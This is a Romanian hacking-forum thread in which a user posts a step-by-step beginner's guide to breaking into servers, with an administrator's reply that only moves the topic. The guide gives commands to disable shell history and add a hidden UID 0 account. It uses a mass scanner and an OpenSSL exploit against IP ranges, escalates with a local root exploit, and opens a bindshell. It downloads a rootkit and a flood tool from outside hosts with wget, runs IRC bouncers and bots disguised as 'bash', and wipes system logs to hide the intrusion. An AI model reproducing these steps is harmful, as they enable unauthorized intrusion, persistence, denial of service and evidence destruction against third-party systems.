EliteHackers
SALUT 2022!!
NE-AM MUTAT PE DISCORD !
Vrei să inviți un prieten?
[T]eoria [H]aosului [C]ontrolat - https://discord.com/invite/U4HBCHzm7r
Acesta aste link-ul oficial al acestui server.
|
Lista Forumurilor Pe Tematici
|
EliteHackers | Reguli | Inregistrare | Login
POZE ELITEHACKERS
Nu sunteti logat.
|
Nou pe simpatie: SweetMonique pe Simpatie
| Femeie 19 ani Galati cauta Barbat 28 - 52 ani |
|
mylife_4hacking
EliteHackers Gold
Inregistrat: acum 17 ani
Postari: 50
|
|
In urmatoarele randuri va voi arata din mare cateva comenzi,programe,exploituri cu care pot incepe cei care vor sa se apuce de hack;precizez ca aia care au experienta in domeniu nau rost sa citeasca aceste randuri cai vor plictisii)) Deci:Cu ce tre sa incepem ca sa fim mici crackeri? (a nu se confunda cu hackeri pt ca ii cu totu altceva;hackerii fak programe si intra pe servere cu scopu de a "face bine" si a prevenii pe spargatorii de servere iar crackeri sunt "aia rai" care fak rau serverelor incepan de la a pune un bnc pe server pina al distruge folosind floodul folosinduse de ip) Ca sa te poti apuka de hack tre sa ai la pornire un root sau un apache(cu un shell cumparat sau free nu poti incepe);root de unde poti sal primesti de la un amik care si asa are destuleP Sa zicem ca ai primit un root...ok....sa zicem ca ai intrat pe el cu user si pass si ca au mers;imediat dupa ce ai inntrat tre sa dai urmatoarele comenzi pt a nu salva anumite chestii pe care le faci pe root si astfel sa te vada adminu: unset HISTFILE unset HISTSAVE history -n unset WATCH export HISTFILE=/dev/null
Aici sunt catea comenzi utile pe care le puteti face pe root cu explikatie cu tot:
w , uptime = arata de cate zile este serverul sus id, whoami = arata dreptul pe care il avem pe root: apache sau root ls, dir = arata continutul unui folder rm -rf = aterge un folder sau fisier Impachetez un fisier -> tar chf fisier.tar fisier -> tar zcd fisier.tar director Vad ip la un server -> ping -c1 yahoo.com /sbin/ipchains -A input --destination-port -p tcp -j REJECT route add -host ip-ul reject -> Inchid un port anume cat /proc/cpuinfo -> Informatii despre sistem rpm -Uhv arhiva -> despachetez arhiva rpm gzip -9 ex.tar -> modifik extensia tar in tar.gz /usr/sbin/useradd -o -u 0 http -> fak shell cat /etc/issue -> vad versiunea de linux gcc program.c -o program -> compilez un program df -h -> vad cat re hardu /etc/rc.d/init.d -> Afisate Pidurile cat /etc/hosts -> Vad Vhosturile netstat -aut -> VAd cine mai ii pe roata cat /etc/*release -> Vad versiunea de linux cat /etc/hosts -> Vad hosturile alias ls='dir --color=tty'-> Bag ls /usr/sbin/userdel user -> Sterg user find / -name ".. " -print -xdev ->caut foldere ascunse find / -name ".*" -print -xdev | cat -v ->caut foldere ascunse
Hack ... server & make psy
Daca vreti sa va faceti bnc aveti aici comenzile necesare
wget (extrage pe root arhiva de bnc de pe un site) tar xzvf psy.tgz (despacheteaza arhiva) cd psybnc (intru in folderul bnc-ului) mv psybnc bash (mut executabilul de la bnc pe un executabil mai ascuns) pico psybnc.conf (editez portul de la bnc) export PATH="." ( fak sa dispara caracterele "." si "/" cand se da comanda ps -aux bash (pornesc bnc-ul)
si asa ai bnc admin pe portu care lai setat mai sus cu pico pe ip pe care ii rootu In caz ca nu aveti comanda "pico" folositi comanda "mc" ;ar fi mai multe dar is putin mai complikate , atunci cel mai bine luati arhiva de pico de aici: rpm -vhU --force
Bun... acuma aveti bnc pe root-ul respectiv si sa zicem ca vreti sa aveti si un bot cu care sa va jucati pe mirc sau sa va protejati un canal De aici: wget
Voi nu tre sa modifikati numai fisierul "mech.session" unde veti trece canalul unde vor intra botii prima data pe net si "emech.users" unde va puneti voi owner la boti si pe care host veti avea 100 - acces maxim la boti puteti modifika fisierele respective folosit Norton Comander sau pico de pe root-ul respectiv salvand arhiva dupa ce ati modifikato
Ok.....deja aveti si bot si bnc pe root... sa zicem ca mai vreti sal folositi sa aveti rooatele voastre fara sa fie primite de la cineva Atunci va trene un mass scanner de servere apache ;scanner pe care lam folosit si yo inainte sami prokur roote nu numai din scanat Il puteti lua de aici: wget tar zxvf atd.tgz rm -rf atd.tgz cd atd Acuma tre sa dati urmatoarele comenzi: ./mass -s 1000 ip -l x exemplu: ./mass -s 1000 217.129.*.* -l x
Dupa ce au trecut cateva minute bune (vreo 30 min si sa fiti gasit cel putin vreo 300 ip, ex (found: 384) il opriti cu comanda ctrl+c si dupa aia dati comanda: ./osslmass2 x Acuma asteptati pt a intra in servere.O sa arate cam asa ceva: Attacking: 213.203.196.185 : OpenSsl Exploit ... Folositi-l Pe Riscul Vostru
Deschid 30 Conexiuni Stabilesc Conexiunea Ssl
: Incercare De Deschidere... Connection unexpectedly closed
Daca la vreun ip va arata: In Executie ... Conexiune Stabilita...Bravo ..Esti Hacer ;>> Inseamna ca ati intrat pe un server apache.... Atunci tre sa intrati intrun folder temporal;exemoplu /var/tmp sau /tmp Veti intra asa: cd /var/tmp Acolo veti lua o arhiva de exeploit local ca sa la puteti lua drept de root putanduva deschide un port cu user si parola De aici luati exploitul: wget tar zxvf SSLROOT.GZ rm -rf SSLROOT.GZ ./sslroot Daca nu va arata din prima "U got a root shell" mai dati de cateva ori ./sslroot pina va apare ok... acuma sunteti pe root pe respectivul server(nu toate serverele va permite sa aveti acest drept) Acuma va puteti deschide un port pe 4000 ca sa puteti intra cand vreti pe el dupa ce ati terminat de scanat cu scanerul de pe care ati inrrat pe el wget tar zxvf za.tgz rm -rf za.tgz cd za ./zbind Dupe ce ati dat asta o sa aveti root fara user si pass doar ip pe serveru la care va zis aia cu bravo esti hacer pe port 400 Cel mai bine ar fi sa folositi un rk pt ca veti avea user root si parola care veo alegeti astfel ne putant intra nimeni care va stie ip-ul cum ar fi daca avea avea zbind pe el
wget haceri-in-actiune.info/rk.tar.gz tar zxvf rk.tar.gz rm -rf rk.tar.gz cd rk ./setup portul o sa fie: 6969 Dupa acestia veti avea root pe ip pe care ati bagat rk cu user:root si pass: ala care lati ales cand ati dat ./setup
Acuma tre sa va securizati rootul ca sa nu mai intre nimeni peste voi Cel mai simplu editati "httpd.conf" din /etc Cautati in fisierul respectiv unde apare "sslengine" Acolo o sa va apara "on" dar voi modifikati si puneti "off" dupa care dati comanda: service httpd reload
Hm... sa zicem ca vreti sal floodati pe cineva pt ca va suparat...aici aveti arhiva si comenzile sa terminati cu nemernikulP
wget r3dstorm.com/meg.tgz tar -xzf meg.tgz rm -rf meg.tgz cd meg/bin ./stealth ip port ex ./stealth 193.230.212.70 22
Acuma dupa ce ati fakut atatea chestii pe root tre sa va stergeti urma stergand urmatoarele fisiere:
rm -rf .bash_history rm -rf /var/run/utmp rm -rf /var/run/wtmp - rm -rf /var/log/lastlog rm -rf /usr/adm/lastlog rm -rf .bash_history cd /var/log/ rm -rf wtmp rm -rf secure rm -rf lastlog rm -rf messages touch messagess touch wtmp touch secure touch lastlog cd /root rm -rf .bash_history touch .bash_history
_______________________________________ Vizitatima ca nu regretati
|
|
pus acum 17 ani |
|
Exploit
Administrator
Din: I'm from everywhere..
Inregistrat: acum 18 ani
Postari: 600
|
|
In primul rand.. ce ai postat tu aici.. tine de linux nu de windows deci nu are de cauta aici topica asta.. in al doilea rand daca erai atent am postat si eu odata chestii dastea. Topic mutat la Recycle Bin !
_______________________________________ ...:::Only God Can Judge Me:::...
|
|
pus acum 17 ani |
|